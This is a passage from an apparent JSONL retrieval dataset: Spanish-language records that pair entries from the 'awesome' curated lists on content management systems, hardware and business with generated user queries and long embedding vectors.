0.05451, 0.01741, 0.06592, 0.023, -0.08825, 0.00187, 0.03423, 0.04424, -0.06598, -0.14494, -0.02732, 0.02774, -0.05555, -0.05115, -0.21551, 0.04363, 0.01744, -0.06684, 0.0023, -0.08645, -0.01837, -0.00206, 0.06151, 0.02524, 0.12559, -0.08269, 0.21655, -0.01848, -0.05971, -0.12099, -0.01196, 0.07326, 0.03234, 0.07984, 0.05385, -0.04261, 0.02213, -0.06355, -0.01977, 0.00781, 0.02954, -0.02543, -0.16491, 0.02518, -0.06126, -0.03668, 0.03265, 0.11742, 0.04031, -0.02657, -0.06776, -0.12629, -0.01488, 0.01752, -0.04712, -0.01198, -0.04857, -0.02546, 0.01204, -0.00542, 0.02803, 0.06181, 0.04876, 0.10805, -0.07054, -0.0581, -0.13758, -0.03261, 0.00146, -0.00569, -0.02939, -0.01143, 0.0161, 0.07327, -0.02256, -0.05652, -0.0568, -0.11875, 0.0083, -0.01737, -0.01493, 0.18871, 0.04529, 0.08259, 0.06876, -0.00403, -0.04016, -0.04813, -0.07965, -0.00274, -0.00856, -0.06248, 0.10712, 0.04998, -0.03268, 0.01804, -0.03585, -0.09189, 0.00882, -0.00568, 0.07166, 0.07354, -0.05852, 0.02059, -0.02671, 0.05536, 0.03624, 0.03893, -0.11233, -0.06331, 0.0121, -0.10486, 0.00034, 0.02801, -0.01563, -0.13658, 0.04404, -0.05343, -0.0689, 0.02683, 0.07772, 0.01429, -0.01983, -0.05372, 0.03149, 0.00605, -0.0021, -0.00531, 0.05935, 0.001, -0.02796, -0.00215, -0.09065, -0.05803, -0.04173, 0.02996, -0.00973, 0.04119, 0.00319, -0.01723, 0.06009, -0.02095, 0.00591, -0.02641, 0.09061, -0.04517, -0.0264, -0.04495, 0.0812, 0.02514, -0.01483, 0.0203, -0.02467, -0.01905, -0.0736, 0.0058, 0.01564, -0.02396, 0.03303, 0.04429, 0.02224, 0.03669, 0.00754, -0.03394, 0.06678, -0.03647, -0.00765, 0.03693, -0.01365, 0.01991, 0.02014, -0.00689, -0.03085, -0.03403, 0.04027, 0.02861, -0.02565, -0.02532, 0.01777, -0.02662, -0.01453, 0.01541, 0.0258, -0.00828, 0.03648, 0.00173, 0.0275, 0.0035, -0.00808, -0.03173, 0.03377, -0.01827, -0.0207, 0.04304, 0.00628, -0.0516, -0.04815, 0.03555, 0.07467, -0.03513, 0.019, 0.00332, 0.00392, -0.04345, 0.06, -0.04743, -0.00654, -0.02229, -0.03624, -0.04641, -0.01194, -0.01813, 0.00751]} +{"tipo": "pregunta", "herramienta": "Content Management Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Content Management Systems", "tema": "content management systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Content Management Systems: Umbraco. Refinery CMS β€” Ruby on Rails CMS. Wagtail β€” Django CMS focused on flexibility and user experience. Textpattern β€” Lightweight PHP-based CMS. Drupal β€” Extensible PHP-based CMS. Craft CMS β€” Content-first CMS. Sitecore β€” NET digital marketing platform that combines CMS with tools for managing multiple websites. Silverstripe CMS β€” PHP MVC framework that serves as a classic or headless CMS. Directus β€” A real-time API and app dashboard for managing SQL database content. Plone β€” Open source Python CMS. Payload β€” Next.js native and open source headless CMS.", "indexar": "cual es una opciΓ³n ligera y flexible para manejar la experiencia de usuario?", "v": [0.10149, 0.04693, -0.22959, -0.07189, -0.00637, -0.06493, -0.15438, -0.00019, -0.14766, -0.18978, 0.02781, -0.09844, 0.06895, 0.00776, 0.00224, -0.00791, 0.06665, 0.01196, -0.02483, -0.07526, -0.06407, 0.05818, -0.08809, -0.01968, -0.10973, 0.00374, 0.11125, -0.13825, -0.10979, 0.02158, 0.02244, 0.13676, 0.09974, -0.03816, 0.11952, 0.11369, -0.04731, 0.01054, 0.02874, 0.06928, 0.0651, 0.01275, -0.05696, 0.10347, 0.07945, 0.08425, -0.06984, 0.0942, 0.02206, 0.05876, -0.02727, 0.00842, -0.1018, 0.03104, 0.05599, 0.01686, 0.18607, -0.12436, 0.04928, 0.01454, -0.00605, -0.02375, 0.00235, -0.00451, -0.03787, -0.02562, 0.00625, -0.08412, -0.05104, 0.00829, -0.03419, 0.10393, -0.03567, -0.00601, -0.04035, 0.1112, 0.05073, 0.04554, 0.09223, 0.04733, 0.07983, -0.00574, -0.03153, 0.05937, -0.06947, -0.09403, 0.11943, -0.09126, 0.01292, 0.08226, 0.11165, -0.03385, 0.00905, 0.02666, -0.04858, -0.06037, 0.08322, 0.09735, 0.02744, -0.06138, 0.09369, 0.02011, -0.06621, 0.10614, -0.04122, -0.05802, 0.0399, -0.05148, -0.10434, -0.14087, 0.0319, 0.00523, -0.01899, -0.01865, -0.00734, 0.05074, -0.05105, -0.0549, -0.03531, -0.0299, -0.01836, -0.05946, 0.05448, -0.02648, 0.0976, 0.04858, 0.06433, 0.03871, -0.07117, -0.0033, -0.04855, 0.02767, -0.06536, -0.0137, 0.10239, -0.0076, 0.08258, -0.01937, 0.00248, 0.00925, 0.02108, 0.02415, -0.03073, -0.03515, 0.09647, -0.09235, 0.0249, 0.00463, -0.02348, 0.04839, -0.03409, -0.04254, 0.02037, 0.08934, -0.07526, 0.00859, -0.03081, -0.02553, -0.07365, 0.07755, -0.00491, 0.01524, 0.03367, 0.01342, 0.02113, -0.07522, -0.04508, -0.07727, 0.02663, -0.01678, -0.06475, 0.03667, -0.01303, 0.05506, 0.02921, -0.08803, -0.09575, -0.04388, -0.01921, -0.00183, 0.02012, 0.02129, -0.00568, 0.00695, 0.0386, -0.07912, -0.06558, 0.0414, 0.02096, 0.08475, 0.02703, 0.10575, -0.02175, -0.04916, -0.006, -0.02536, 0.01809, -0.09015, -0.01351, 0.01857, -0.02988, 0.03319, -0.04747, -0.07589, 0.02173, -0.00277, -0.0301, 0.07576, -0.00675, 0.04946, 0.04061, -0.03523, 0.11525, -0.01182, -0.04069, -0.01447, 0.02246, -0.01412, 0.01201, -0.00615, 0.06693, 0.0331, 0.07431, -0.00342, -0.05338, 0.02094, -0.00065, 0.00966, -0.03538, 0.03449, 0.0249, 0.05476, -0.05298, -0.02234, 0.06837, 0.05463, 0.05835, 0.00788, -0.02775, -0.09585, 0.02651, 0.07434, -0.02108, -0.01627, -0.00024, -0.03381, -0.07522, 0.07955, -0.06278, -0.09603, -0.05758, 0.02045, 0.07459, -0.03398, 0.05359, -0.04358]} +{"tipo": "pregunta", "herramienta": "Hardware", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Hardware", "tema": "hardware", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Hardware: Robotics. Internet of Things. Electronics β€” For electronic engineers and hobbyists. Bluetooth Beacons. Electric Guitar Specifications β€” Checklist for building your own electric guitar. Plotters β€” Computer-controlled drawing machines and other visual art robots. Robotic Tooling β€” Free and open tools for professional robotic development. LIDAR β€” Sensor for measuring distances by illuminating the target with laser light. Open Hardware β€” Open-source hardware projects. ADS-B β€” Technology broadcasting aircraft's identity, position, and data periodically. Flying FPV β€” Open hardware and software related to drones / UAVs.", "indexar": "que programa puedo usar para diseΓ±ar mi propia guitarra elΓ©ctrica?", "v": [0.04839, 0.0147, -0.21128, -0.06832, 0.09751, 0.03275, -0.02719, 0.07062, -0.05309, -0.1081, -0.07355, 0.02646, -0.07185, -0.1079, 0.01332, -0.10893, 0.08483, -0.11777, 0.05616, -0.00241, -0.0442, 0.06771, -0.13691, -0.09341, -0.02907, 0.00053, -0.00453, 0.03199, -0.08065, 0.13133, 0.07463, 0.13826, 0.0954, -0.1488, -0.02088, -0.05951, 0.02723, 0.01799, 0.10204, -0.051, 0.06205, 0.00357, 0.01592, -0.01684, 0.04296, -0.01838, 0.07949, -0.03769, -0.07097, 0.07112, -0.09784, 0.11359, -0.0137, 0.06138, 0.10454, -0.15816, 0.05892, -0.15158, -0.00395, -0.02138, 0.07703, 0.00296, 0.08084, 0.04444, 0.02778, -0.03288, -0.03574, -0.07658, -0.08538, -0.07744, -0.03516, 0.01304, -0.01606, -0.09457, 0.04177, -0.00514, -0.03675, -0.09808, 0.11234, -0.03422, -0.01727, -0.07949, -0.02483, 0.04487, -0.0908, 0.07192, 0.06634, -0.10101, -0.01123, -0.00691, -0.05082, 0.03269, -0.06483, 0.05226, 0.00368, -0.03219, 0.1378, 0.08094, 0.08386, -0.02122, 0.09888, -0.08057, -0.00933, 0.03423, 0.03541, -0.02319, 0.09232, -0.03551, 0.04857, 0.08152, -0.10667, -0.00626, 0.01065, -0.10253, -0.08137, 0.00756, -0.055, -0.12302, -0.06017, -0.00291, 0.03452, 0.00771, 0.09309, -0.02557, 0.07178, 0.07768, -0.08403, 0.15332, -0.00941, -0.00766, 0.00514, 0.01182, 0.02181, -0.03937, -0.07851, 0.08437, -0.114, -0.09699, -0.00199, -0.04263, 0.04551, 0.13699, -0.04593, -0.07777, -0.00776, 0.01002, 0.00279, -0.08736, 0.02022, 0.03517, -0.0355, 0.05367, 0.0148, 0.01899, -0.0335, 0.02128, 0.02205, -0.03661, -0.04504, 0.06671, -0.09203, 0.01389, -0.02313, 0.01534, 0.08109, -0.04844, -0.0333, -0.03445, 0.06123, 0.05334, -0.05879, 0.03565, -0.00375, -0.00825, -0.00505, -0.09103, -0.02341, -0.07113, 0.02045, -0.01448, -0.04032, 0.09413, -0.07141, -0.01709, -0.04181, 0.05712, -0.00749, -0.01798, 0.0496, 0.0189, -0.04917, 0.01509, -0.02582, 0.07517, -0.00951, -0.04327, 0.03911, 0.04466, -0.07007, -0.05373, 0.00704, -0.00334, -0.01854, -0.01134, 0.05833, 0.04767, -0.05183, 0.05206, 0.00202, 0.07874, 0.015, -0.10547, 0.08694, -0.04496, -0.02104, -0.02559, 0.03539, 0.00103, 0.04367, 0.07414, 0.0189, 0.0608, 0.04766, 0.06943, 0.01919, 0.01214, 0.05866, -0.00629, 0.0022, 0.09117, 0.01362, -0.00213, -0.0278, -0.02929, -0.00977, -0.00709, -0.03436, -0.04442, -0.07851, -0.02157, 0.02008, 0.10001, -0.06818, -0.06275, 0.00858, -0.04426, -0.03164, -0.0245, -0.06717, -0.03051, -0.05021, 0.03534, 0.07103, -0.05931, 0.04417, 0.0447]} +{"tipo": "pregunta", "herramienta": "Hardware", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Hardware", "tema": "hardware", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Hardware: Robotics. Internet of Things. Electronics β€” For electronic engineers and hobbyists. Bluetooth Beacons. Electric Guitar Specifications β€” Checklist for building your own electric guitar. Plotters β€” Computer-controlled drawing machines and other visual art robots. Robotic Tooling β€” Free and open tools for professional robotic development. LIDAR β€” Sensor for measuring distances by illuminating the target with laser light. Open Hardware β€” Open-source hardware projects. ADS-B β€” Technology broadcasting aircraft's identity, position, and data periodically. Flying FPV β€” Open hardware and software related to drones / UAVs.", "indexar": "cual es una herramienta libre para desarrollar herramientas robΓ³ticas profesionales?", "v": [0.11359, -0.08762, -0.07094, -0.20421, 0.04744, -0.09245, -0.02135, 0.01012, -0.05261, -0.08187, -0.09672, -0.10605, 0.0749, -0.05946, 0.13853, 0.04323, 0.03087, -0.12565, -0.08322, 0.08242, -0.06033, -0.03173, -0.10797, 0.0233, 0.03419, -0.05867, 0.03811, 0.03557, -0.20628, 0.16612, 0.02349, 0.01586, 0.03014, -0.04793, -0.08205, -0.09476, 0.01216, -0.01037, 0.05211, 0.04643, -0.01269, -0.00518, -0.08334, 0.05268, 0.139, 0.03294, -0.01805, -0.03615, -0.02526, 0.12827, -0.08755, -0.10836, 0.01461, -0.07386, 0.05661, -0.23615, 0.21231, -0.12496, -0.04147, -0.13131, -0.06434, 0.05313, -0.06337, -0.04125, -0.02703, -0.06225, 0.02253, -0.11324, -0.04537, 0.07366, 0.01052, -0.05257, -0.0514, -0.03532, -0.00792, 0.02863, -0.07614, 0.08755, 0.01073, -0.03025, 0.03925, -0.02243, -0.06671, 0.0102, 0.02197, -0.02033, 0.0904, -0.01277, 0.03584, -0.03889, 0.01789, 0.09674, -0.0408, 0.02539, 0.08251, 0.03142, 0.08215, -0.02022, -0.00368, 0.0175, 0.16395, -0.04223, -0.09749, 0.03096, -0.05529, 0.0582, -0.02769, -0.00658, -0.02271, -9e-05, 0.01952, 0.06207, 0.07753, 0.0066, -0.1357, 0.06945, 0.00487, -0.0353, -0.02473, -0.04106, 0.0655, 0.05374, -0.03043, -0.06158, 0.04125, 0.03645, -0.06109, 0.09846, -0.06729, -0.10404, 0.04302, -0.03378, -0.10186, -0.02154, 0.02131, 0.05894, 0.10876, -0.10758, -0.05759, -0.02358, -0.01452, 0.02816, -0.02378, -0.12838, 0.01244, -0.00837, -0.01149, -0.06979, 0.00744, -0.04769, -0.03155, -0.0382, 0.04688, 0.11019, -0.08482, -0.01041, -0.09123, 0.01234, -0.06267, 0.01336, -0.04893, -0.01352, 0.01259, -0.03437, -0.02873, 0.01504, 0.07537, 0.06367, -0.00673, 0.07625, 0.02942, 0.07003, 0.05776, 0.01761, 0.06494, -0.01569, -0.02472, -0.00966, -0.01409, -0.11107, -0.02547, 0.04853, -0.01676, -0.02801, -0.02509, -0.04745, 0.01723, -0.07551, 0.04618, 0.10997, -0.03307, -0.04887, -0.0154, -0.07265, 0.06102, 0.00805, -0.01392, -0.00826, -0.02196, -0.01489, -0.042, -0.02137, -0.01096, -0.02466, -0.02242, 0.03793, 0.01134, -0.07179, -0.02419, -0.00355, 0.02822, -0.01285, 0.02962, -0.01958, 0.03351, -0.01708, -0.01323, 0.04846, 0.00989, -0.03225, 0.04511, -0.03021, 0.00283, -0.01822, -0.00792, 0.02827, 0.04012, 0.05517, -0.00098, -0.01252, 0.02469, -0.02831, 0.00778, -0.01218, -0.02193, -0.0146, 0.03448, -0.02593, -0.02088, 0.00089, -0.01016, 0.0944, -0.05887, -0.0597, -0.04328, -0.01577, -0.04951, -0.05843, -0.05059, -0.05066, -0.04379, 0.03231, 0.05391, -0.04614, 0.00493, -0.01085]} +{"tipo": "pregunta", "herramienta": "Hardware", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Hardware", "tema": "hardware", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Hardware: Robotics. Internet of Things. Electronics β€” For electronic engineers and hobbyists. Bluetooth Beacons. Electric Guitar Specifications β€” Checklist for building your own electric guitar. Plotters β€” Computer-controlled drawing machines and other visual art robots. Robotic Tooling β€” Free and open tools for professional robotic development. LIDAR β€” Sensor for measuring distances by illuminating the target with laser light. Open Hardware β€” Open-source hardware projects. ADS-B β€” Technology broadcasting aircraft's identity, position, and data periodically. Flying FPV β€” Open hardware and software related to drones / UAVs.", "indexar": "con que puedo crear mapas de distancias usando luz lΓ‘ser?", "v": [0.17483, 0.03034, -0.17851, -0.04619, -0.12224, 0.04887, -0.17421, 0.15751, -0.13605, 0.01093, -0.06275, -0.08603, -0.08503, -0.01931, 0.02044, -0.00234, 0.03585, 0.08852, -0.09636, -0.12382, 0.04523, -0.01276, -0.17877, -0.13079, 0.01769, -0.04776, 0.11395, -0.21432, -0.15667, -6e-05, -0.16769, 0.18175, -0.02272, 0.05191, -0.07979, -0.06953, 0.00641, 0.05356, -0.02951, -0.0246, -0.02551, 0.10261, 0.0809, 0.01524, -0.02438, -0.11792, -0.05642, -0.00908, 0.00545, -0.07475, -0.0185, 0.0483, -0.08598, -0.00381, -0.01944, -0.13293, 0.09169, -0.00076, 0.10656, -0.01712, -0.01621, 0.00333, 0.03401, 0.02285, 0.00733, -0.03805, 0.00112, -0.03438, -0.07471, 0.0246, -0.03111, -0.00597, -0.0092, 0.01337, 0.08193, 0.10286, -0.08959, -0.07546, 0.01841, 0.04387, -0.03334, -0.04464, -0.08287, -0.01792, -0.03678, -0.01465, 0.06313, 0.04635, 0.00951, -0.07952, -0.04739, 0.10412, 0.10304, 0.01832, 0.03079, 0.00937, 0.01902, 0.04318, -0.08344, 0.07837, 0.03937, -0.07793, -0.10009, 0.04682, 0.05417, -0.00087, 0.04913, -0.06435, -0.0131, -0.03406, -0.00015, 0.00096, -0.00236, -0.14779, -0.10087, -0.02327, -0.029, 0.01949, -0.05453, -0.01725, -0.00837, -0.02182, 0.04576, 0.02926, 0.09093, -0.03167, -0.10642, -0.01267, -0.05833, 0.01684, -0.05261, 0.05254, -0.02036, -0.06089, -0.07391, 0.07331, -0.11206, -0.03285, -0.02848, 0.0206, 0.02972, 0.00287, 0.03273, -0.11131, -0.0112, 0.07711, -0.05655, -0.11292, -0.04184, 0.03764, -0.05156, -0.01653, 0.01963, 0.0976, 0.01672, 0.0596, 0.02057, -0.06879, -0.03384, 0.06614, -0.04454, 0.12532, -0.02802, 0.01305, 0.08453, -0.01729, -0.05422, -0.01787, 0.05006, 0.05995, -0.10853, 0.03741, 0.00194, 0.00579, 0.03255, -0.05696, -0.0347, 0.01711, -0.027, 0.00705, -0.01172, 0.01306, 0.00788, 0.01403, -0.01128, 0.07371, -0.0264, 0.02887, 0.0421, -0.04074, -0.03307, 0.02694, 0.08774, -0.02265, 0.01977, -0.04313, 0.07037, -0.03531, 0.00504, -0.06226, -0.01094, -0.02195, 0.01659, -0.03476, 0.04809, -0.01697, -0.03421, 0.09037, -0.03492, -0.02776, 0.08295, -0.01456, 0.00102, -0.03951, -0.01539, 0.0061, 0.05647, -0.0769, -0.01536, -0.03117, -0.0048, 0.07518, -0.04522, 0.0166, 0.029, 0.02622, 0.06787, -0.01281, -0.0139, 0.01983, 0.0611, 0.00987, -0.01636, -0.04047, -0.02542, 0.02383, -0.01396, -0.02525, -0.01655, -0.00806, 0.00911, -0.00313, -0.07044, -0.01223, -0.01523, -0.05772, -0.03937, 0.01206, -0.01026, -0.07641, -0.04165, 0.00571, 0.06754, -0.0267, 0.05009, 0.04977]} +{"tipo": "pregunta", "herramienta": "Business", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Business", "tema": "business", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Business: Open Companies. Places to Post Your Startup. OKR Methodology β€” Goal setting & communication best practices. Indie β€” Independent developer businesses. Tools of the Trade β€” Tools used by companies on Hacker News. Clean Tech β€” Fighting climate change with technology. Wardley Maps β€” Provides high situational awareness to help improve strategic planning and decision making. Social Enterprise β€” Building an organization primarily focused on social impact that is at least partially self-funded. Engineering Team Management β€” How to transition from software development to engineering management. Developer-First Products β€” Products that target developers as the user. Billing β€” Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. Engineering Strategy β€” How to design and execute engineering strategies for tech leadership.", "indexar": "que herramienta sirve para definir objetivos y comunicar las mejores prΓ‘cticas de OKR?", "v": [-0.02828, 0.06589, -0.14754, -0.20244, 0.13359, -0.24497, -0.04621, 0.08691, -0.06138, -0.13668, -0.07875, -0.05403, 0.07672, -0.18143, 0.12815, 0.07546, 0.05668, -0.12434, -0.05147, 0.04291, -0.02927, -0.00385, -0.02491, 0.02829, -0.13604, -0.02949, 0.0514, -0.07078, -0.12132, 0.04766, 0.03853, 0.11413, 0.05285, -0.10371, 0.028, 0.00362, -0.1591, 0.07257, -0.002, 0.05826, -0.04334, -0.03742, 0.01846, 0.14639, 0.1653, 0.06771, -0.07392, 0.04192, -0.01948, 0.01472, -0.02393, -0.13396, -0.01333, -0.00281, -0.01109, -0.09255, 0.09592, -0.06749, 0.02726, -0.14697, 0.00945, -0.06325, -0.00418, -0.03348, 0.1119, 0.00501, 0.04558, -0.05954, -0.13395, 0.07911, 0.06226, 0.0331, -0.00785, -0.04839, 0.07925, 0.06939, 0.02335, 0.07951, 0.03938, -0.12133, 0.06429, -0.09225, -0.16578, 0.04091, -0.07297, -0.02351, 0.09261, 0.00481, -0.02946, -0.07998, 0.01072, 0.10578, -0.02501, -0.04067, 0.00072, -0.0144, 0.0573, -0.0532, 0.06818, 0.02992, 0.05865, -0.06235, -0.10127, -0.02179, -0.05445, 0.00591, -0.01093, -0.03342, -0.00286, -0.06188, -0.00253, -0.03998, 0.02383, 0.00131, 0.01306, -0.05671, -0.05899, -0.06205, 0.00432, -0.01419, -0.04367, 0.03256, 0.02548, 0.02639, -0.01422, 0.00075, -0.05096, 0.04979, 0.05611, 0.02172, -0.00346, 0.02931, -0.05845, 0.04574, -0.07582, -0.0075, 0.11461, -0.01805, 0.02085, -0.09019, -0.02799, -0.00582, -0.02391, -0.10475, 0.01623, -0.00672, 0.04892, -0.0368, -0.01018, 0.05443, -0.0267, -0.06405, -0.01179, 0.02317, -0.03417, -0.02735, -0.0497, -0.04996, -0.02532, 0.03606, -0.10268, -0.06132, 0.02271, 0.01448, 0.07034, -0.05128, 0.01416, -0.00055, 0.12362, 0.02242, 0.0395, -0.00566, 0.06022, -0.02939, -0.02826, -0.05138, -0.04686, -0.03673, -0.00925, -0.10305, -0.01314, 0.00751, -0.02979, -0.00901, 0.03023, -0.01612, -0.03381, -0.04421, 0.00853, 0.06695, 0.03073, -0.03322, 0.01255, -0.06614, 0.02072, -0.08696, -0.08759, -0.05172, 0.0337, 0.0334, -0.05255, -0.03533, -0.02361, -0.00798, 0.06278, 0.07534, -0.07415, -0.02196, -0.04055, 0.07267, 0.02037, -0.01858, 0.04757, -0.00265, -0.05758, -0.02792, 0.02149, -0.00506, 0.00231, 0.04521, 0.01019, 0.00923, 0.04785, -0.10736, 0.00142, 0.04808, 0.01227, -0.00195, 0.01935, -0.00488, -0.01585, 0.05268, 0.00711, -0.0213, 0.04899, -0.01137, 0.0136, -0.0161, -0.0376, -0.08603, 0.00193, 0.03835, -0.00088, -0.01209, -0.03502, -0.04346, -0.04917, 0.0178, 0.00597, -0.05472, -0.04013, -0.00109, 0.10184, 0.00594, 0.0297, -0.02942]} +{"tipo": "pregunta", "herramienta": "Business", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Business", "tema": "business", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Business: Open Companies. Places to Post Your Startup. OKR Methodology β€” Goal setting & communication best practices. Indie β€” Independent developer businesses. Tools of the Trade β€” Tools used by companies on Hacker News. Clean Tech β€” Fighting climate change with technology. Wardley Maps β€” Provides high situational awareness to help improve strategic planning and decision making. Social Enterprise β€” Building an organization primarily focused on social impact that is at least partially self-funded. Engineering Team Management β€” How to transition from software development to engineering management. Developer-First Products β€” Products that target developers as the user. Billing β€” Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. Engineering Strategy β€” How to design and execute engineering strategies for tech leadership.", "indexar": "cΓ³mo puedo construir una organizaciΓ³n enfocada en impacto social que sea parcialmente autofinanciada?", "v": [-0.03955, 0.17561, -0.08462, -0.05705, 0.06244, -0.09848, 0.0199, -0.11658, -0.17991, -0.072, -0.08059, -0.04379, -0.02028, 0.08622, 0.06065, -0.01209, 0.08939, -0.13539, -0.07999, -0.0824, -0.02471, -0.08653, 0.04256, 0.00273, -0.0057, -0.06899, 0.07336, -0.0594, -0.12467, 0.01612, 0.10879, 0.03053, 0.17088, 0.03463, 0.01904, -0.04733, -0.03244, 0.06138, 0.04124, -0.10363, -0.05064, 0.04137, -0.04468, -0.06246, 0.09218, 0.07748, -0.07534, 0.03331, -0.02078, 0.03237, -0.00894, 0.02469, -0.11598, -0.01063, 0.01392, 0.03223, 0.03123, -0.19953, 0.00407, 0.08112, -0.1086, 0.05431, -0.0202, 0.06215, 0.02725, 0.04603, 0.0311, 0.03585, -0.03339, -0.00396, -0.00674, -0.15956, -0.03167, 0.00302, 0.06161, 0.02866, 0.09124, 0.07621, -0.10915, -0.07325, 0.07081, -0.05218, -0.12477, 0.07749, 0.02943, 0.05076, 0.00705, 0.00197, -0.02665, -0.0721, -0.13088, -0.04494, -0.0563, -0.09277, -0.22129, 0.04507, -0.00255, -0.03755, -0.00795, -0.08202, -0.01067, -0.15862, -0.0057, -0.06839, -0.01359, 0.01553, 0.02545, -0.0329, 0.04808, -0.08798, -0.00103, 0.04657, -0.05158, -0.08162, 0.062, 0.06617, -0.02386, 0.05831, 0.09531, -0.1149, -0.02069, 0.0154, 0.02211, -0.0079, -0.08174, 0.00796, -0.08679, 0.13761, 0.06032, -0.04988, -0.02398, 0.0829, -0.07564, -0.00114, -0.02989, -0.01196, -0.04204, -0.09352, 0.00928, -0.02353, 0.08308, 0.04466, -0.00967, -0.11397, -0.06342, -0.00132, -0.04375, -0.10326, -0.06135, 0.02449, 0.00065, 0.01533, 0.00144, 0.03642, -0.06593, 0.02525, 0.01258, -0.01313, 0.08306, 0.08384, -0.01888, 0.04757, -0.03343, -0.0168, 0.00445, -0.06553, -0.07802, -0.02445, 0.00652, -0.04195, 0.04424, 0.05465, 0.02139, -0.00424, 0.07426, -0.03792, 0.02176, -0.0764, 0.0013, 0.0428, -0.063, 0.04325, -0.036, 0.00161, 0.03468, -0.03833, -0.02883, -0.00596, -0.03639, 0.01349, 0.03354, 0.00823, 0.00552, -0.00287, 0.06394, -0.03765, -0.06954, -0.05175, 0.08173, -0.00874, -0.07843, -0.05488, -0.03583, 0.00169, 0.00132, 0.01354, -0.02454, 0.08748, -0.0526, 0.10471, 0.02335, -0.06838, 0.05891, -0.00191, -0.02934, 0.01831, 0.03288, -0.05019, -0.06937, 0.035, 0.00972, -0.00667, 0.08399, 0.01985, 0.05932, -0.0043, 0.04302, -0.00257, 0.03625, 0.02552, -0.00308, 0.03069, -0.06314, -0.00448, 0.08287, 0.0445, -0.02895, -0.03969, -0.09438, -0.01993, 0.06679, 0.07763, -0.00504, -0.04823, 0.00775, -0.06552, -0.02273, 0.08704, 0.00798, -0.02922, -0.02753, 0.03851, 0.06269, -0.02524, 0.05365, 0.0261]} +{"tipo": "pregunta", "herramienta": "Business", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Business", "tema": "business", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Business: Open Companies. Places to Post Your Startup. OKR Methodology β€” Goal setting & communication best practices. Indie β€” Independent developer businesses. Tools of the Trade β€” Tools used by companies on Hacker News. Clean Tech β€” Fighting climate change with technology. Wardley Maps β€” Provides high situational awareness to help improve strategic planning and decision making. Social Enterprise β€” Building an organization primarily focused on social impact that is at least partially self-funded. Engineering Team Management β€” How to transition from software development to engineering management. Developer-First Products β€” Products that target developers as the user. Billing β€” Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. Engineering Strategy β€” How to design and execute engineering strategies for tech leadership.", "indexar": "con quΓ© programa gestiono transiciones del desarrollo de software a la gestiΓ³n de equipos de ingenierΓ­a?", "v": [0.0404, -0.04663, 0.06263, -0.28043, 0.13818, -0.0487, -0.02778, 0.01231, -0.07591, -0.05361, -0.10819, 0.03426, -0.02112, -0.10087, 0.00294, 0.08274, 0.14467, -0.1592, 0.03325, 0.02394, -0.07769, 0.1065, 0.03945, -0.05579, -0.04084, 0.00987, -0.01117, -0.13204, -0.07176, 0.02548, -0.00369, -0.02913, 0.13351, -0.07798, -0.02318, -0.05463, -0.02127, 0.06979, 0.03598, 0.02951, -0.035, -0.14709, -0.03322, 0.00514, 0.18273, -0.0954, 0.1174, -0.00197, 0.04914, -0.04708, -0.09186, 0.06427, 0.01304, -0.07468, 0.10354, -0.08979, 0.02464, -0.11059, 0.04509, -0.0656, -0.05652, 0.0716, 0.03022, -0.03434, 0.02942, -0.02502, -0.01158, -0.06907, -0.11489, -0.00182, 0.01102, 0.01879, 0.01204, 0.03595, 0.03786, 0.06056, 0.01149, 0.15656, -0.07321, -0.05451, -0.03181, 0.03403, -0.08536, 0.05669, -0.03409, -0.04893, 0.01112, -0.01986, 0.01582, 0.00923, -0.06678, -0.07817, -0.04982, -0.01703, 0.05866, 0.00588, 0.13862, 0.05051, 0.04308, 0.07951, -0.00536, -0.0245, -0.07831, 0.12794, -0.06303, 0.17193, 0.11813, -0.08422, -0.01538, 0.0421, -0.02365, 0.04837, 0.02342, 0.0145, -0.07069, -0.02474, 0.03556, -0.04076, 0.01607, -0.04951, -0.07736, -0.03144, 0.07293, -0.02953, 0.0863, -0.0916, 0.04478, 0.16228, 0.0154, 0.04147, -0.01613, -0.03412, -0.08428, 0.01592, -0.05858, -0.01316, 0.0511, 0.02842, 0.05073, -0.01174, -0.07598, 0.12, -0.01437, 0.03897, 0.00663, -0.04, -0.00749, -0.09008, -0.01043, 0.03843, 0.00321, 0.00334, 0.03281, 0.0895, -0.12337, 0.03627, 0.02741, 0.01627, -0.09006, 0.06222, -0.09284, 0.00128, -0.05653, -0.04376, 0.05818, 0.02327, 0.02197, 0.07801, 0.05346, 0.02451, -0.00598, 0.07612, 0.03249, -0.05836, -0.03174, -0.07077, -0.01295, -0.07601, -0.00317, -0.08004, -0.08114, 0.04109, 0.04267, 0.07639, -0.00897, -0.00199, -0.09419, 0.00553, -0.01542, 0.03083, 0.03718, -0.02301, -0.03687, -0.00555, 0.03668, 0.02151, -0.04083, -0.00807, -0.00134, -0.03645, -0.06064, -0.02038, 0.01333, -0.0254, -0.02768, 0.07819, -0.01469, 0.02969, -0.01548, 0.11687, 0.05274, -0.02035, 0.0241, 0.05521, -0.0355, -0.03268, 0.03173, 0.08886, 0.07584, 0.02065, 0.02644, -0.04143, 0.05062, 0.05178, 0.01636, -0.05364, 0.0306, 0.06448, 0.06103, 0.02067, 0.00054, -0.00581, -0.01266, -0.01484, 0.00779, 0.03125, -0.01183, -0.01602, -0.03494, -0.09439, -0.01431, 0.08833, 0.00506, -0.06085, -0.05074, 0.03476, -0.0674, -0.03227, 0.02072, 